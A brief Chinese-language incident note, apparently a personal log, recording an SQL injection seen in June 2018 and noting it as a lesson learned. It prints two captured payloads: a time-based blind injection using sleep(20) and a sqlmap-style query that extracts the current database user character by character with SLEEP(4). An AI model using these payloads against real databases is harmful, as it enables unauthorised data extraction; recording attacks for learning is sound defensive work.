18年6月发生的 SQL注入
SELECT COUNT(*) AS `numrows` FROM `table` WHERE `id` = ''+(select*from(select(sleep(20)))a)+''
'|(SELECT 'CGKq' FROM DUAL WHERE 2651=2651 AND 5914 = IF((ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),4,1))>48),SLEEP(4),5914))||'
记录一下 长点教训